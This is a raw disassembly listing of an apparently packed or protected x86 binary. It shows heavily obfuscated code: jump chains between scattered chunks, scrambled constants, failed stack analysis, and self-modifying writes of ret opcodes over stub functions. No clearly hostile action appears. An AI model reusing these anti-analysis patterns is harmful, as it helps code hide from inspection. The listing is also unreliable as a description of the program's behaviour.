; START OF FUNCTION CHUNK FOR sub_44978D
loc_454DCA: ; CODE XREF: sub_44978D+Bj
jmp nullsub_202
; END OF FUNCTION CHUNK FOR sub_44978D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CE09
loc_454DCF: ; CODE XREF: sub_44CE09:loc_4599A2j
jnz loc_43E6C0
; END OF FUNCTION CHUNK FOR sub_44CE09
; START OF FUNCTION CHUNK FOR sub_457A66
loc_454DD5: ; CODE XREF: sub_457A66+5E8j
jmp sub_4445DC
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F9C6
loc_454DDA: ; CODE XREF: sub_43F9C6+DBB0j
jmp loc_4476EE
; END OF FUNCTION CHUNK FOR sub_43F9C6
; ---------------------------------------------------------------------------
sub ecx, edi
mov eax, esi
jmp loc_43E6B8
; =============== S U B R O U T I N E =======================================
sub_454DE8 proc near ; CODE XREF: sub_454466+Ap
; ut7h7i2x:00455DC8j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004396F0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C2B6 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044C34C SIZE 00000005 BYTES
xchg ecx, [esp+0]
loc_454DEB: ; CODE XREF: ut7h7i2x:0044B807j
pop ecx
mov eax, [esp-4+arg_0]
push ebx
mov ebx, ecx
xchg ebx, [esp+0]
jmp loc_4396F0
sub_454DE8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_454DFA: ; CODE XREF: sub_450FDE+4C45j
test edx, ecx
jmp loc_44479F
; END OF FUNCTION CHUNK FOR sub_450FDE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453E14
loc_454E01: ; CODE XREF: sub_453E14-16F47j
jl loc_453E3B
jmp loc_44877A
; END OF FUNCTION CHUNK FOR sub_453E14
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455111
loc_454E0C: ; CODE XREF: sub_455111-C830j
or edi, 0EA0D77DBh
loc_454E12: ; CODE XREF: sub_455111:loc_445918j
push 4CF42D0Eh
pop eax
rol eax, 0Eh
jmp loc_4544C3
; END OF FUNCTION CHUNK FOR sub_455111
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A3D0
loc_454E20: ; CODE XREF: sub_44A3D0+5D7Cj
mov eax, ds:dword_43AF8C
call sub_43C413
loc_454E2B: ; CODE XREF: sub_4394DC+1F5C2j
jmp sub_44E2C4
; END OF FUNCTION CHUNK FOR sub_44A3D0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455461
loc_454E30: ; CODE XREF: sub_455461+A9Dj
jmp loc_458DFE
; END OF FUNCTION CHUNK FOR sub_455461
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459C1B
loc_454E35: ; CODE XREF: sub_459C1B:loc_45115Fj
xchg edi, [esp+0]
jmp loc_43DEAE
; END OF FUNCTION CHUNK FOR sub_459C1B
; ---------------------------------------------------------------------------
loc_454E3D: ; DATA XREF: sub_44A4C0-9844o
xor ecx, 52C9D4CEh
add eax, ecx
call sub_453B87
; START OF FUNCTION CHUNK FOR sub_45137D
loc_454E4A: ; CODE XREF: sub_45137D+16j
jmp loc_4562BE
; END OF FUNCTION CHUNK FOR sub_45137D
; ---------------------------------------------------------------------------
jmp ds:off_41D09C
; ---------------------------------------------------------------------------
loc_454E55: ; CODE XREF: ut7h7i2x:00455728j
jmp loc_44C8BB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440FC3
loc_454E5A: ; CODE XREF: ut7h7i2x:loc_4496ADj
; sub_440FC3:loc_4530B3j ...
pop edx
jz loc_450A06
mov eax, [esp+0]
push edx
jmp sub_4540C1
; END OF FUNCTION CHUNK FOR sub_440FC3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440CEC
loc_454E6A: ; CODE XREF: sub_440CEC+19872j
jns loc_450691
cmp edi, 0B2A2DE56h
jmp loc_456B58
; END OF FUNCTION CHUNK FOR sub_440CEC
; ---------------------------------------------------------------------------
mov ecx, 0BE14D8AFh
jmp sub_43FA50
; ---------------------------------------------------------------------------
loc_454E85: ; CODE XREF: ut7h7i2x:0044F4D3j
adc esi, 7777E88Fh
loc_454E8B: ; CODE XREF: ut7h7i2x:loc_44F4BCj
and edx, 1C41AC7Bh
add edx, 4B848h
popf
jmp loc_448BCB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444029
loc_454E9D: ; CODE XREF: sub_444029:loc_45A308j
add eax, ebp
call sub_44D3B0
; END OF FUNCTION CHUNK FOR sub_444029
; START OF FUNCTION CHUNK FOR sub_439701
loc_454EA4: ; CODE XREF: sub_439701+3A1Cj
jmp loc_4580E0
; END OF FUNCTION CHUNK FOR sub_439701
; ---------------------------------------------------------------------------
loc_454EA9: ; CODE XREF: ut7h7i2x:loc_440CE7j
cmp ecx, 3C57203Dh
jmp loc_44A3A6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4561CA
loc_454EB4: ; CODE XREF: sub_4561CA:loc_4504D7j
push offset sub_445CE9
jmp nullsub_247
; END OF FUNCTION CHUNK FOR sub_4561CA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DB21
loc_454EBE: ; CODE XREF: sub_43DB21-B0j
rol ebp, 5
adc eax, 1CE57D8Bh
loc_454EC7: ; CODE XREF: sub_43DB21:loc_43DA69j
and eax, 2E9BDC38h
sub eax, 0AC722E13h
xor eax, 570C0E26h
add eax, ebp
add eax, 0D57D97C1h
jmp loc_446D62
; END OF FUNCTION CHUNK FOR sub_43DB21
; ---------------------------------------------------------------------------
loc_454EE6: ; CODE XREF: ut7h7i2x:loc_44AC31j
jmp loc_446BA1
; ---------------------------------------------------------------------------
loc_454EEB: ; CODE XREF: ut7h7i2x:loc_449A47j
push 0F920EAA5h
pop eax
add eax, 655A4C65h
xor eax, 4B663A6Fh
add eax, ebp
add eax, 0EAE2F297h
jmp loc_4455CB
; =============== S U B R O U T I N E =======================================
sub_454F0A proc near ; CODE XREF: ut7h7i2x:0043DCE1j
; ut7h7i2x:0044194Cp
xchg eax, [esp+0]
pop eax
push 0A55F5B42h
pop edx
or edx, 38F3CC3Ch
xor edx, 0FB270640h
test edx, 40h
jmp loc_44247F
sub_454F0A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449744
loc_454F2B: ; CODE XREF: sub_449744+8j
xchg edi, [esp+4+var_4]
push 4243677Bh
pop ecx
sub ecx, 77CE2A26h
cmp ecx, 0E5BB9CB1h
jmp loc_44BBFC
; END OF FUNCTION CHUNK FOR sub_449744
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449E96
loc_454F45: ; CODE XREF: sub_449E96+ACB3j
mov eax, edx
xchg eax, [esp+0]
call sub_4396F5
mov eax, 5BE2C7B9h
; END OF FUNCTION CHUNK FOR sub_449E96
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_454F54: ; CODE XREF: sub_43AA94+C24Bj
call sub_43AA94
push edi
mov edi, ebx
xchg edi, [esp+8+var_8]
jmp loc_43EF9D
; END OF FUNCTION CHUNK FOR sub_43AA94
; ---------------------------------------------------------------------------
loc_454F64: ; CODE XREF: ut7h7i2x:0044D492j
jz loc_4469B4
shl edx, 8
jmp sub_43D9A8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455E0B
loc_454F72: ; CODE XREF: sub_455E0B+Bj
call sub_447F0A
loc_454F77: ; CODE XREF: sub_44E2C4+8427j
jmp loc_4390D3
; END OF FUNCTION CHUNK FOR sub_455E0B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4501C1
loc_454F7C: ; CODE XREF: sub_4501C1+Cj
jmp loc_45A40B
; END OF FUNCTION CHUNK FOR sub_4501C1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A0D
loc_454F81: ; CODE XREF: sub_457A0D-13D59j
jmp loc_43FA83
; END OF FUNCTION CHUNK FOR sub_457A0D
; ---------------------------------------------------------------------------
loc_454F86: ; CODE XREF: ut7h7i2x:0044396Bj
jmp loc_44CE99
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_384. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_454F8C: ; CODE XREF: sub_43A556+16E48j
jmp loc_44CDE1
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_454F91: ; CODE XREF: sub_457A66-1C76Aj
jmp loc_44827E
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
loc_454F96: ; CODE XREF: ut7h7i2x:0043DD5Bj
xor eax, 943E5E35h
call sub_43AA94
mov ds:dword_41D190, eax
lea eax, nullsub_20
jmp loc_456762
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_437. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_454FB3: ; CODE XREF: ut7h7i2x:0044D146j
jmp loc_44A67B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EDA4
loc_454FB8: ; CODE XREF: sub_43EDA4:loc_44286Dj
jnz loc_45A3B2
; END OF FUNCTION CHUNK FOR sub_43EDA4
; START OF FUNCTION CHUNK FOR sub_44C273
loc_454FBE: ; CODE XREF: sub_44C273+5561j
jmp loc_4440CC
; END OF FUNCTION CHUNK FOR sub_44C273
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B5CF
loc_454FC3: ; CODE XREF: sub_44B5CF+43CDj
jmp loc_450FD0
; END OF FUNCTION CHUNK FOR sub_44B5CF
; ---------------------------------------------------------------------------
xor eax, 0DE1FE230h
push edx
jmp loc_43F087
; =============== S U B R O U T I N E =======================================
sub_454FD4 proc near ; CODE XREF: sub_4533DE:loc_43F3CBp
; ut7h7i2x:0045A73Dj
arg_0 = dword ptr 4
xchg ecx, [esp+0]
pop ecx
add eax, 0D3D67477h
xchg eax, [esp-4+arg_0]
jmp sub_43F058
sub_454FD4 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_454FE6 proc near ; DATA XREF: sub_439170+14856o
mov ecx, edx
pop edx
push offset loc_44E452
jmp nullsub_207
sub_454FE6 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446F9A
loc_454FF3: ; CODE XREF: sub_446F9A:loc_4417AAj
jge loc_448443
loc_454FF9: ; CODE XREF: sub_459FE9+Fj
jmp loc_450968
; END OF FUNCTION CHUNK FOR sub_446F9A
; ---------------------------------------------------------------------------
jb loc_43BB10
jl loc_459AD0
jmp loc_4449B1
; =============== S U B R O U T I N E =======================================
sub_45500F proc near ; CODE XREF: sub_448CDC:loc_43FEB0p
; sub_456923:loc_443454j ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043998A SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043BF2A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043BFBD SIZE 00000029 BYTES
; FUNCTION CHUNK AT 0043D92E SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00441AC3 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00447859 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E565 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F05D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F4DE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457718 SIZE 00000005 BYTES
jo loc_43D92E
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
cmp ds:dword_43A044, 0
jmp loc_44F4DE
sub_45500F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439FD5
loc_455027: ; CODE XREF: sub_439FD5:loc_43AED4j
or eax, eax
jnz loc_43C0FB
jmp loc_450861
; END OF FUNCTION CHUNK FOR sub_439FD5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_455034: ; CODE XREF: sub_4459EE-60FEj
push edx
call sub_4508DB
mov eax, 0BC7399C0h
call sub_43AA94
push offset loc_44BE06
jmp loc_45618F
; END OF FUNCTION CHUNK FOR sub_4459EE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E84C
loc_45504E: ; CODE XREF: sub_44E84C:loc_4439DBj
push offset sub_449231
jmp nullsub_209
; END OF FUNCTION CHUNK FOR sub_44E84C
; ---------------------------------------------------------------------------
loc_455058: ; CODE XREF: ut7h7i2x:00451E18j
jl loc_448D35
; START OF FUNCTION CHUNK FOR sub_446CA0
loc_45505E: ; CODE XREF: sub_446CA0:loc_439729j
not ecx
; END OF FUNCTION CHUNK FOR sub_446CA0
; =============== S U B R O U T I N E =======================================
sub_455060 proc near ; CODE XREF: sub_4529E0:loc_43C9B2p
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043B59E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043CD49 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043CF1F SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0043ED0E SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043F694 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FDBB SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004410A8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004435C3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448863 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449BA7 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044A621 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044B077 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044BA54 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044BBAB SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044FBC7 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00450283 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450636 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045445B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457EFF SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00458409 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004595D9 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00459A53 SIZE 00000012 BYTES
xchg esi, [esp+0]
pop esi
jmp loc_43F694
sub_455060 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F57E
loc_455069: ; CODE XREF: sub_44F57E+831Dj
push offset loc_442079
jmp nullsub_303
; END OF FUNCTION CHUNK FOR sub_44F57E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458389
loc_455073: ; CODE XREF: sub_458389:loc_44B6D6j
push offset loc_45882C
jmp nullsub_327
; END OF FUNCTION CHUNK FOR sub_458389
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452C82
loc_45507D: ; CODE XREF: sub_452C82+1j
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
jmp loc_44CD7A
; END OF FUNCTION CHUNK FOR sub_452C82
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B5D4
loc_455088: ; CODE XREF: sub_43B5D4:loc_44A210j
; sub_43B5D4+EC4Aj
add ebx, 661D223Ch
popf
push offset loc_43D93B
jmp nullsub_212
; END OF FUNCTION CHUNK FOR sub_43B5D4
; ---------------------------------------------------------------------------
loc_455099: ; CODE XREF: ut7h7i2x:loc_454156j
mov esi, 2B5A2661h
xchg edx, eax
jmp loc_44B49F
; ---------------------------------------------------------------------------
xor edi, 62A88D09h
mov edx, [edi]
jmp sub_4516C6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_4550B2: ; CODE XREF: sub_4459EE+87CBj
add ecx, edi
popf
and ebp, eax
cdq
jmp loc_4551E6
; END OF FUNCTION CHUNK FOR sub_4459EE
; ---------------------------------------------------------------------------
jb loc_453A1D
jmp sub_44045E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459111
loc_4550C8: ; CODE XREF: sub_459111-1CDB2j
jl loc_447BAB
loc_4550CE: ; CODE XREF: ut7h7i2x:0044D880j
jmp loc_459044
; END OF FUNCTION CHUNK FOR sub_459111
; ---------------------------------------------------------------------------
loc_4550D3: ; CODE XREF: ut7h7i2x:00444219j
jmp loc_45054A
; ---------------------------------------------------------------------------
jz loc_441EA2
mov edx, eax
jmp loc_447BAA
; ---------------------------------------------------------------------------
loc_4550E5: ; CODE XREF: ut7h7i2x:loc_43F4C0j
lea eax, nullsub_28
mov byte ptr [eax], 0C3h
jmp loc_43BDFC
; ---------------------------------------------------------------------------
push esi
push 40F5A968h
pop esi
jmp loc_4507D7
; =============== S U B R O U T I N E =======================================
sub_4550FF proc near ; CODE XREF: ut7h7i2x:0044CF46j
; sub_4519D2:loc_4552D7p
; FUNCTION CHUNK AT 004399BD SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0043FCAD SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044A8C6 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00458F02 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
jo loc_44A8C6
add edx, 14h
jmp loc_43FCAD
sub_4550FF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_455111 proc near ; DATA XREF: sub_44E65D+B856o
; FUNCTION CHUNK AT 00439EC2 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00443C87 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445918 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448531 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004488DB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A6D6 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00450493 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00454286 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004544C3 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00454E0C SIZE 00000014 BYTES
sub al, 99h
push 3FDEEEDCh
pop edx
add edx, 0D8F25A4Fh
rol edx, 0Dh
jmp loc_448531
sub_455111 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_455127 proc near ; CODE XREF: ut7h7i2x:0044ED24j
; sub_443A06+F743p
xchg edi, [esp+0]
pop edi
add eax, 2AAC2493h
mov eax, [eax]
jmp loc_43BB51
sub_455127 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_455138: ; CODE XREF: ut7h7i2x:0043D6DCj
pop edi
pop ecx
xor eax, eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446ACE
loc_45513D: ; CODE XREF: sub_446ACE:loc_43DAB3j
mov byte ptr [eax], 0C3h
jmp loc_45530D
; END OF FUNCTION CHUNK FOR sub_446ACE
; =============== S U B R O U T I N E =======================================
sub_455145 proc near ; CODE XREF: sub_405E33+47p
; ut7h7i2x:004399E4j
; DATA XREF: ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00439D0B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043A8D2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043AABF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C885 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044478C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004475D7 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044CBE5 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044CF67 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D69B SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044E0CB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FEF2 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00452495 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00452ED2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045406A SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045677D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AB2A SIZE 00000005 BYTES
push ecx
push 7A46D451h
pop ecx
jmp loc_44D69B
sub_455145 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_455151: ; CODE XREF: sub_43FF65:loc_43BC85j
push edi
mov edi, eax
xchg edi, [esp+4+var_4]
call sub_440493
push esi
mov esi, eax
xchg esi, [esp+8+var_8]
jmp loc_44B8BC
; END OF FUNCTION CHUNK FOR sub_43FF65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_455167: ; CODE XREF: sub_439BF8+15FB5j
push 0A4BBB637h
pop esi
or esi, 11F063E3h
js loc_44C74A
loc_455179: ; CODE XREF: sub_44825D-7826j
mov ebp, 0DBD21AC9h
loc_45517E: ; CODE XREF: sub_43D364+14243j
; ut7h7i2x:00455699j
xor edi, 0F23F24B8h
add edi, 0EA704ED4h
xchg edi, [esp+0]
jmp loc_453F1F
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4596E5
loc_455193: ; CODE XREF: sub_4596E5-A013j
jmp loc_443789
; END OF FUNCTION CHUNK FOR sub_4596E5
; ---------------------------------------------------------------------------
loc_455198: ; CODE XREF: ut7h7i2x:00446EFDj
push ebp
mov ebp, esp
add esp, 0FFFFFF90h
call sub_453D8B
mov edx, 9278ADE5h
jmp loc_45A1D7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4558CC
loc_4551AD: ; CODE XREF: sub_4558CC:loc_442D83j
mov ds:off_41D088, eax
lea eax, sub_4558CC
mov byte ptr [eax], 0C3h
jmp loc_452378
; END OF FUNCTION CHUNK FOR sub_4558CC
; =============== S U B R O U T I N E =======================================
sub_4551C1 proc near ; CODE XREF: sub_403209+AAp
; sub_404A3E+B9p ...
; FUNCTION CHUNK AT 00456ED0 SIZE 00000006 BYTES
call sub_456EE0
jmp loc_456ED0
sub_4551C1 endp
; ---------------------------------------------------------------------------
loc_4551CB: ; CODE XREF: ut7h7i2x:loc_453FBDj
rol edx, 13h
jmp sub_44D066
; =============== S U B R O U T I N E =======================================
sub_4551D3 proc near ; CODE XREF: ut7h7i2x:00447E8Cp
; ut7h7i2x:0045706Aj
; FUNCTION CHUNK AT 0043BDA8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444D7F SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004481EC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044952A SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004506FA SIZE 00000019 BYTES
xchg edi, [esp+0]
pop edi
push ebx
push 0FB58CB5Fh
pop ebx
rol ebx, 15h
jmp loc_4506FA
sub_4551D3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_4551E6: ; CODE XREF: sub_4459EE+F6CAj
shr ebx, 1Bh
loc_4551E9: ; CODE XREF: sub_4459EE:loc_44E1B3j
call sub_452D56
test al, al
jz loc_45A36B
jmp loc_4477C5
; END OF FUNCTION CHUNK FOR sub_4459EE
; =============== S U B R O U T I N E =======================================
sub_4551FB proc near ; CODE XREF: ut7h7i2x:0043AF59j
; sub_452C66+4B10p
xchg ebx, [esp+0]
pop ebx
loc_4551FF: ; CODE XREF: sub_43CDBA+5A65j
call sub_457A66
mov eax, 0CE14EFFFh
call sub_446BB5
loc_45520E: ; CODE XREF: ut7h7i2x:00443903j
jmp nullsub_151
sub_4551FB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452B14
loc_455213: ; CODE XREF: sub_452B14:loc_44ACBEj
jz loc_43ED88
jmp loc_4570F8
; END OF FUNCTION CHUNK FOR sub_452B14
; ---------------------------------------------------------------------------
loc_45521E: ; CODE XREF: ut7h7i2x:00446E14j
mov eax, edx
xchg eax, [esp]
call sub_4576A2
mov eax, 0D1CB0F56h
call sub_43AA94
push ecx
jmp loc_441771
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_146. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_455239 proc near ; DATA XREF: sub_446ACE:loc_4410B2o
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0044F6DE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453AD3 SIZE 0000000A BYTES
jns loc_453AD3
pop edx
mov eax, [esp-4+arg_0]
push edi
mov edi, edx
xchg edi, [esp+0]
jmp loc_44F6DE
sub_455239 endp
; ---------------------------------------------------------------------------
cmp esi, edx
jmp loc_43CB82
; ---------------------------------------------------------------------------
loc_455255: ; CODE XREF: ut7h7i2x:0044EEF9j
xchg ebp, [esp]
mov eax, edx
call sub_4576A2
mov eax, [esp]
loc_455262: ; CODE XREF: ut7h7i2x:0043D4B8j
push edi
loc_455263: ; CODE XREF: ut7h7i2x:0044E7C7j
push 0BDF1B950h
pop edi
xor edi, 236B90B8h
jmp loc_45837B
; ---------------------------------------------------------------------------
loc_455274: ; CODE XREF: ut7h7i2x:loc_4402CDj
; ut7h7i2x:004402E6j
add ebx, 55836DDEh
sub ebx, 2391ABECh
and ebx, 5522B6E3h
add ebx, 48B3C3CDh
add eax, ebx
jmp loc_453F5F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C273
loc_455293: ; CODE XREF: sub_44C273-9C0Aj
add eax, 4CB434C7h
shr edx, 3
jmp loc_451FD7
; END OF FUNCTION CHUNK FOR sub_44C273
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4431FF
loc_4552A1: ; CODE XREF: sub_4431FF:loc_459980j
push 0FC6FA9B5h
pop eax
jmp loc_449E4A
; END OF FUNCTION CHUNK FOR sub_4431FF
; =============== S U B R O U T I N E =======================================
sub_4552AC proc near ; CODE XREF: ut7h7i2x:0044918Fj
; sub_44E5DC+377Bp
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00453822 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00455667 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
push 0
mov edx, esp
jmp loc_455667
sub_4552AC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444374
loc_4552B9: ; CODE XREF: sub_444374+Ej
; sub_43B83C+1D244j
call sub_44B452
loc_4552BE: ; CODE XREF: sub_45A25C-DAD0j
jmp loc_45496F
; END OF FUNCTION CHUNK FOR sub_444374
; ---------------------------------------------------------------------------
loc_4552C3: ; CODE XREF: ut7h7i2x:00442CB0j
jmp loc_4522D2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4519D2
loc_4552C8: ; CODE XREF: sub_4519D2+1Bj
mov edx, [ebx+edx+80h]
or edx, edx
jz loc_448223
loc_4552D7: ; CODE XREF: ut7h7i2x:loc_44A8B5j
; sub_455EA7j
call sub_4550FF
loc_4552DC: ; CODE XREF: sub_4411BF+3ED5j
jmp loc_43D0F6
; END OF FUNCTION CHUNK FOR sub_4519D2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449E96
loc_4552E1: ; CODE XREF: sub_449E96+4BFCj
push 4639267Dh
pop edi
and edi, 405D5ADCh
rol edi, 0Ch
jmp loc_45675D
; END OF FUNCTION CHUNK FOR sub_449E96
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457541
loc_4552F5: ; CODE XREF: sub_457541+3j
push edi
mov edi, ecx
xchg edi, [esp-8+arg_0]
mov esp, ebp
jmp loc_450D9E
; END OF FUNCTION CHUNK FOR sub_457541
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_455302: ; CODE XREF: sub_43AB62:loc_43DB15j
; sub_43FBB6+6D54j
xchg edi, eax
rol ebp, 17h
jmp loc_4500CB
; END OF FUNCTION CHUNK FOR sub_43AB62
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_473. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446ACE
loc_45530D: ; CODE XREF: sub_446ACE+E672j
jmp nullsub_216
; END OF FUNCTION CHUNK FOR sub_446ACE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446785
loc_455312: ; CODE XREF: sub_446785+7j
jmp loc_445099
; END OF FUNCTION CHUNK FOR sub_446785
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459111
loc_455317: ; CODE XREF: sub_459111-1289Fj
cmp ebx, 8D3AF3E2h
jmp loc_457A8E
; END OF FUNCTION CHUNK FOR sub_459111
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_455322: ; CODE XREF: sub_447CBE:loc_43C2F4j
and ecx, 0B09C520Ch
loc_455328: ; CODE XREF: sub_4445DC:loc_4409F3j
mov eax, [ebp-4]
cmp byte ptr [eax], 0F1h
jnz loc_446C28
jmp loc_43FD07
; END OF FUNCTION CHUNK FOR sub_447CBE
; ---------------------------------------------------------------------------
